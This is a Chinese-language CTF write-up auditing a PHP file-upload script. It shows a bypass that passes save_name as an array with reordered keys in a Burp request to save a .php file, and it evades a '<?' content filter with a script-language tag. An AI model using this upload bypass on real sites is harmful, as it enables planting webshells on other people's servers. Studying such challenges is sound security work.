一次ctf文件上传php代码审计

朋友发的一个ctf题，做了好久才做出来，记录一下。

0x01 源码

<?php
highlight_file(__FILE__);
@mkdir("./upload");

if (isset($_POST['submit'])) {
        $is_upload = false;
        $text = null;
        if(!empty($_FILES['upload_file'])){
            $allow_type = array('image/jpeg','image/png','image/gif');
            if(!in_array($_FILES['upload_file']['type'],$allow_type)){
                $text = "type forbidden";
            }else{
                $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
                $temp_name = $_FILES['upload_file']['tmp_name'];
                if (!is_array($file)) {
                    $file = explode('.', strtolower($file));
                }

                $ext = end($file);
                $allow_suffix = array('jpg','png','gif');
                if (!in_array($ext, $allow_suffix)) {
                    $text = "ext forbidden";
                }else{
                    $file_name = reset($file) . '.' . $file[count($file) - 1];
                    $img_path = "./upload" . '/' .$file_name;
                    if (mb_strpos(file_get_contents($_FILES['upload_file']['tmp_name']), "<?") !== FALSE) {
                        $text = "hacker";
                    }else{
                        if(file_exists($img_path)){
                            $text = "file exist already";
                        }else{
                            if (move_uploaded_file($temp_name, $img_path)) {
                                $text = "upload succeed";
                                $is_upload = true;
                            } else {
                                $text = "upload failed";
                            }
                        }
                    }
                }
            }
        }else{
            $text = "please upload your file";
        }
}
?>

0x02 代码初步分析

1. 由于服务使用了php版本为5.6.40，且容器为Apache，所以00截断用不了，其他的解析漏洞也用不上。
2. 对上传文件的Content-Type做了白名单限制，限制为图片类型，由于没有对文件内容进行校验，所以只需要把shell写到一个文本文件再重命名为jpg就行。
3. 对文件后缀进行了白名单限制，限制只能为jpg、png、gif。
4. 对文件内容进行了检查，不允许文件内容中出现<?。

0x03 代码深入分析

由于是ctf，所以这里必然有漏洞，做不出来就是知道的东西太少了。
由于php是弱类型语言，在字符串与数字进行比较时，会将字符串强制转换为数字再进行比较，所以：

php -r "echo 0=='jpg';"
1

但是基于multipart/form-data的POST请求得到的数据只能是文件或者字符串或者数组，不可能是数字，所以这个思路是不行的。
考虑到如下内容：

$ext = end($file);
$file_name = reset($file) . '.' . $file[count($file) - 1];

在已经获得$ext作为后缀名的情况下，没必要再通过$file来获取后缀名进行拼接。
考虑到这里的$file必须是个数组的情况下，explode()函数不可控，那么可以通过更改input标签中name的方式来将save_name修改为一个数组：

image.png
由于需要对后缀名进行校验，那么数组长度必然大于或等于2，count($file) - 1的值只能为key是数组长度减1的值，但是此处不可控。
经过多次测试：

<?php
$a[1] = 1;
$a[0] = 0;
echo end($a);
echo "<br>";
var_dump($a);
?>
//输出结果：
0
array(2) { [1]=> int(1) [0]=> int(0) } 

php中手动用数字来定义的key，并不会按照从小到大的顺序进行存储，所以end()函数只会提取到数组最后定义的key对应的值，而通过数组长度减一得到的值就不一定和end()函数得到的值一致了。

当使用$a=[0,1]的写法时，end()函数得到的值与数组长度减一得到的值就又一致了。
采用绕过的答案如下：

#直接修改burp数据包：
Content-Disposition: form-data; name="save_name[1]"

1.php
-----------------------------6027882332248
Content-Disposition: form-data; name="save_name[0]"

jpg

php文件标记可以采用如下三种格式：

// 1.
<?php 
?>
//2. 需要在php.ini中设置short_open_tag = On
<?
?>
//3.
<script language="php">
</script>
//4. 需要在php.ini中配置asp_tags = On ，一般默认是Off，7.0以上版本已移除这个配置
<%
%>

针对文件内容检查可采用第三种格式。